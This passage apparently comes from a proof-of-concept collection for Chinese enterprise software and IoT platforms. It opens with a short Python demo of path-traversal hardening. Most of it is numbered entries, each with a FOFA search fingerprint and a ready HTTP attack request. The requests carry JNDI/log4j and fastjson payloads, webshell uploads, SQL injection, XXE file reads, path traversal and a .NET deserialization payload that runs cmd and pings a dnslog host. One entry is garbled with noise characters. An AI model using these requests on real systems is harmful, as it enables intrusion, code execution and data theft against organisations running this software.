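    with open(os.path.join(root, user_path), "rb") as f:
        return f.read()


def resolve_safely(root: str, user_path: str) -> str:
    """Map user_path to a real path inside root or raise ValueError.
    Order matters: decode first (so %2e%2e and %252e%252e are judged as '..'),
    then reject URL schemes (the Dahua 'file:' case), absolute/drive paths and
    NUL bytes, then let realpath resolve '.', '..' and symlinks and require the
    result to still sit under the real root."""
    p = user_path
    for _ in range(3):                      # bounded repeated decoding
        d = unquote(p)
        if d == p:
            break
        p = d
    if "\x00" in p:
        raise ValueError("NUL byte in path")
    if urlsplit(p).scheme:
        raise ValueError("URL scheme not allowed: " + p)
    if p.startswith(("/", "\\")) or os.path.isabs(p) or (len(p) > 1 and p[1] == ":"):
        raise ValueError("absolute path not allowed: " + p)
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, p))
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise ValueError("path escapes root: " + p)
    return candidate


def read_hardened(root: str, user_path: str) -> bytes:
    with open(resolve_safely(root, user_path), "rb") as f:
        return f.read()


def _attempt(fn, *args):
    """Return the bytes read, or the exception class name if the call refused or failed."""
    try:
        return fn(*args)
    except (ValueError, OSError) as e:
        return type(e).__name__


def demo() -> dict:
    """Throwaway layout assumed for the example: <tmp>/static/logo.png is the only
    file that should be servable and <tmp>/secret.txt sits one level above.
    Returns {label: (vulnerable_result, hardened_result)} for each payload shape."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "static")
    os.mkdir(root)
    with open(os.path.join(root, "logo.png"), "wb") as f:
        f.write(b"PNG")
    secret = os.path.join(base, "secret.txt")
    with open(secret, "wb") as f:
        f.write(b"SECRET")
    payloads = [
        ("legitimate", "logo.png"),
        ("dot-dot", "../secret.txt"),           # Casdoor shape
        ("dot padding", "./../secret.txt"),     # Sangfor /etc/./passwd shape
        ("absolute path", secret),              # iOffice c:/windows/win.ini shape
        ("file scheme", "file://" + secret),    # Dahua readPic fileUrl=file: shape
    ]
    return {label: (_attempt(read_vulnerable, root, p), _attempt(read_hardened, root, p))
            for label, p in payloads}
```

The containment test is the realpath comparison, not a string search for `..`: a filter that only strips `../` is exactly what `/etc/./passwd` and double encoding are there to defeat.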
21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version = NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

) x* f9 ?5 p2 G! V- @7 b7 V! ^- W43. 用友GRP-U8 userInfoWeb SQL注入致RCE
% d# o7 k9 E/ n1 B& y' iFOFA:app="用友-GRP-U8"# p: R3 M: k6 k, z: X. @9 P
POST /services/userInfoWeb HTTP/1.1
. g: q$ F( V+ d5 r9 Y; `Host: your-ip9 p$ z0 {9 r: W( v: K, J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# n+ H! V: q; b* Z) Y/ m* ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ C: J$ P+ |! d5 r, b
Accept-Encoding: gzip, deflate& M5 B3 p, S: u8 |1 b$ K5 ~, n
Accept-Language: zh-CN,zh;q=0.9
! E3 f* \5 Z+ x+ ~- p# \1 D( MConnection: close3 j* z" V. k' n+ e+ T+ ?+ c, G
SOAPAction:7 |) ]" f' d8 h" h# a3 V5 w( ]8 _
Content-Type: text/xml;charset=UTF-8- j: s: c( e) t: R( h/ l; h6 @+ H# U7 }

" A1 Q/ v* u2 _, r$ l6 E<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
; C7 u' N. W! ]) q   <soapenv:Header/>
1 l- ~$ c* Q% X, |" C6 \1 w   <soapenv:Body>" ^4 u1 x9 T. j5 [3 y5 a. J
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">$ i4 A7 P- ~" [5 l! K- n
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
' s# K! D" \7 o      </ser:getUserNameById>
) G% Z. F1 b+ y" m7 e0 K   </soapenv:Body>
9 W$ w8 p' g4 R) n7 E$ `. Z8 B' r</soapenv:Envelope>
5 e' a' Q$ Z- F/ H0 @; M$ O5 J  G( p4 ?4 h* J: m
0 n2 i8 k3 K  [5 y9 g
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Commerce ERP (云时空社会化商业ERP系统) validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
